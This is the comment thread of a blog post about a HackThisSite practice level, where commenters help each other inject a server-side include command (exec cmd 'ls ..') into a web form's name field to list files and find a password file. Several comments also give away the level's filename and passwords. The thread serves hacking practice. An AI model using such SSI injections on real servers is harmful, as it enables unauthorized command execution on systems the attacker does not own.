• Blog
• Plugins
• Code
• Guides
• Papers

http://www.hackthissite.org/missions/basic/8/tmp/nxlvdjcp.shtml

54 Comments »

1. Can someone help me? I am on basic 8 and when I put it “” I got this “If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.”

   Will someone one please help me?

   Comment by SalidifiedPumpkin — January 27, 2007 @ 5:11 am

2. SalidifiedPumpkin, my bad. The quotation marks on my page are typographical, not the regular " ones. Just type the code in yourself, and it should work.

   Comment by Tim — January 28, 2007 @ 4:00 pm

3. wrote: in this box but it comes :
   if you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.
   ageain plz help me

   Comment by beginner — February 3, 2007 @ 12:21 pm

4. i wrote

   Comment by beginner — February 3, 2007 @ 12:22 pm

5. beginner, use cmd=”ls”. Other commands won’t work, as the error says.

   Comment by Tim — February 3, 2007 @ 4:15 pm

6. if i use cmd=”ls” than a list with 14 shthmls appears have i to manipulate url or the enter ur name box

   plz tell it in easy words i dont speak english very well

   Comment by beginner — February 4, 2007 @ 10:41 am

7. beginner, sorry — it’s the wrong directory. You should use cmd=”ls ..” in order to find the filelist of the directory above.

   Comment by Tim — February 4, 2007 @ 11:52 am

8. yo tim i got up 2 the but when i hit enter it sez “If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.” So what do i do

   Comment by Da'Von — March 3, 2007 @ 7:08 pm

9. iight i got passed the problem with having 2 change the command but no i c 3 things and i dont no wat 2 do with them

   Comment by Da'Von — March 3, 2007 @ 7:36 pm

10. Ok i got it now

    Comment by Da'Von — March 3, 2007 @ 11:23 pm

11. you really should make the directions a little clearer i got it but it took me a while

    Comment by jackhomo — March 13, 2007 @ 1:59 am

12. it needs to be this:
    l, s, space, dot, dot

    other wise it will come up with the error

    Comment by andrew — March 13, 2007 @ 3:12 am

13. jackhomo, in which way should they be clerarer?

    Comment by Tim — March 13, 2007 @ 5:29 am

14. Hi, I keep getting the error that tells me to make the code more simple…. Help?

    Comment by Anonymus — March 15, 2007 @ 1:32 pm

15. Directions are very clear.

    Although when I enter the obsure filename in my browser, I get a 404 not found page. I’m assuming the correct URL for the password is http://www.hackthissite.org/*obscurefilename*.php

    There must be something I am doing wrong.

    Comment by rap1df1re — March 20, 2007 @ 6:32 pm

16. rap1df1re: Remember the rest of the URL. It should be http://www.hackthissite.org/missions/basic/8/*obscurefilename*.shtml

    Comment by Tim — March 21, 2007 @ 1:08 am

17. No that did not work either. I am beginning to believe there’s a bug on this level. See if you can figure it out.

    Comment by rap1df1re — March 21, 2007 @ 3:52 am

18. rap1df1re, what output do you get after executing the first command, and exactly what URL do you go to afterwards?

    Comment by Tim — March 21, 2007 @ 2:46 pm

19. Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.

    I then use the url -

    http://www.hackthissite.org/au12ha39vc.php

    which returns….

    Not Found
    The requested URL /au12ha39vc.php was not found on this server.

    Apache/1.3.37 Server at http://www.hackthissite.org Port 80

    Comment by rap1df1re — March 21, 2007 @ 8:37 pm

20. rap1df1re, try this URL instead:

    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    Remember that it is in the same directory, not in the root directory!

    Comment by Tim — March 21, 2007 @ 9:33 pm

21. look i have put evrything one time it came up but it was the wrong directory. so i put the little (..) in it but then it says to manipulate the code so i tried but couldn’t figure out. so i used some of the ones on this site and others. buti keep getting the little name think with no url’s. please help me

    Comment by lenice — April 12, 2007 @ 1:56 pm

22. i’m not sure if my last comment went through

    Comment by lenice — April 12, 2007 @ 2:04 pm

23. ok so i did everything right. bu it s still coming up with thename crap. i don’t know how to minipulate my code and the ones on here just bring me back to the name stuff with no url’s please help me

    Comment by lenice — April 12, 2007 @ 2:06 pm

24. lenice, the “name stuff” is a list of the files in the current directory, hackthissite.org/missions/8/. Just append the filename to the end of that URL.

    Comment by Tim — April 12, 2007 @ 9:32 pm

25. i’m not getting any file names,i get

    hi,(what ever i typed in)
    your name has (however many letters).

    Comment by lenice — April 13, 2007 @ 1:03 pm

26. lenice, instead of typing your name in, you should type in the SSI injection described in the post.

    Comment by Tim — April 13, 2007 @ 1:38 pm

27. i did i don’t type my name i type exatly what these forums and stuff say. and i read everything can find on ssi

    Comment by Anonymous — April 13, 2007 @ 10:02 pm

28. Anonymous: Then what happens? Also, can you type exactly what you type? Please substitute < and > for &lt; and &gt;, so that this blog won’t think it’s a tag.

    Comment by Tim — April 14, 2007 @ 11:05 am

29. Thanks for the well written tip. I had been trying to use the cd command followed by ls, but that wouldn’t work. Using ls .. makes sense, but is there a way to use the cd command? What would that look like?

    Comment by Peace — April 22, 2007 @ 5:25 pm

30. Peace: The cd command would probably work just fine if you did something like:

    <!--#exec cmd="cd .. && ls"-->

    That code would first execute cd .., going to the previous directory. ls would then be executed, giving the list of file names.

    I suppose that the alternative codes were omitted for the sake of simplicity.

    Comment by Tim — April 23, 2007 @ 8:09 pm

31. Peace be upon ya..
    thanx,for making me proceed in this mission.

    Comment by Amad_Kaslan — April 28, 2007 @ 4:17 pm

32. i don t get what i have to enter in the file name when i enter what they say it does the same thing the if i enter anything else!!!

    Comment by jean — May 11, 2007 @ 11:00 pm

33. nvm

    Comment by jean — May 11, 2007 @ 11:05 pm

34. I’m totally confused. Where do i type the comand :

    ??????

    Comment by HFF — May 14, 2007 @ 1:02 am

35. Thanks Tim, this, and everything on this site is really helpful

    Comment by glenn — June 1, 2007 @ 6:55 am

36. in the name box you type
    
    make sure you only type 2 dots. this worked for me.

    Comment by MICHhimself — July 3, 2007 @ 11:51 pm

37. Comment by Anonymous — November 18, 2007 @ 4:00 pm

38. Comment by Anonymous — November 18, 2007 @ 4:02 pm

39. try it at IE.

    Comment by Avi — January 6, 2008 @ 11:10 am

40. ok i did it but i will never know how here is the password for all of you

    ad293aca

    but the person that made this site needs to be a bit more clear

    Comment by louis — January 30, 2008 @ 7:46 pm

41. they have changed it.

    Comment by deceylon — February 10, 2008 @ 8:02 pm

42. No matter what I put in for the SSI to run it won’t work. Typing in , , or any variation, even doesn’t work. Tried with quotes, without, etc… the message “if you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.” always appears. I cannot think of any other unix command to list files, and I can’t think of another way to get the file. I have “cheated” and beat the password by getting the file name from somewhere else. But I cannot see how this mission is beatable now. Anyone have any ideas?

    Comment by Alex — April 4, 2008 @ 7:34 pm

43. This it exactly what you need to put in the box where it says “Name”:

    This it’s going to give you:

    Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.

    Pick au12ha39vc.php

    Comment by [system] — May 12, 2008 @ 2:06 am

44. i dont get it..

    Comment by bladeruin — May 16, 2008 @ 10:57 am

45. k, so i am going to put my question very simply: “HUH?!?!?!”
    what the article said went in one ear and out the other. could anyone rephrase that in stupid language for ppl like me? thnx, your all awesome!

    Comment by major noob! — June 13, 2008 @ 12:42 am

46. The password is ddba81c6

    Comment by HTS — June 22, 2008 @ 10:17 am

47. Go to:
    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    for the pass

    Comment by L33T H4Z3 — June 28, 2008 @ 8:50 am

48. L33T H4Z3: That wouldn’t teach them very much, would it?

    Comment by Tim — July 2, 2008 @ 7:39 am

49. For those who this is unclear. In the name field type the following without the parenthesis and press submit(#exec cmd=”ls ..”) But.. Some later browser versions manipulate your input field. I verified by sniffing my traffic when it was failing for me, and my browser firefox 3.0 was dropping the # and it would not work. So if this hack is not working for some people (where you just get “hi #exec cmd=”ls ..”" Rather than a list of files, try an older version of browser. Having older software in your arsenal of tools is a good thing!! Joshua.parker@supportitonline.com

    Comment by josh — July 5, 2008 @ 8:54 pm

50. Type this into the name field

    <!–#exec cmd=”ls ..”–>

    follow through to saved file and copy paste filename given into url bar like this:

    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    (might have to put your own ” in directly with your own keyboard).

    Hope thats english enough, as took me awhile to understand everything above.

    Comment by David — August 1, 2008 @ 8:42 pm

51. i feel nubish, but wtf, why doesn’t any of this work? and the code is missing in the actual page (i see plenty of comments with it, just not the code itself)

    Comment by Nosidius — August 8, 2008 @ 11:06 pm

52. is what i found that is close to working, and yes i added the ..’s and it still gave me the security error, wtf am i doing wrong? as far as i’ve seen thats the code i SHOULD need for getting to it >.> and i tried experimenting by editing out parts, you cannot get rid of the arrows, and both CMD and exec have to stay, because then it gives error msg again

    Comment by Nosidius — August 8, 2008 @ 11:39 pm

53. The command should be like this:

    p/s!: do not copy it directly(typographical error may occur)

    when it says the file is saved, open the link given and copy the directory! :-)

    Comment by Zul — September 14, 2008 @ 5:22 pm

54. Will somebody lend a guy a hand? :) It says I have to make things more pertaining to the level… simple instuctions maybe?

    Comment by Anonymous — September 18, 2008 @ 8:47 pm

RSS feed for comments on this post. TrackBack URI

Leave a comment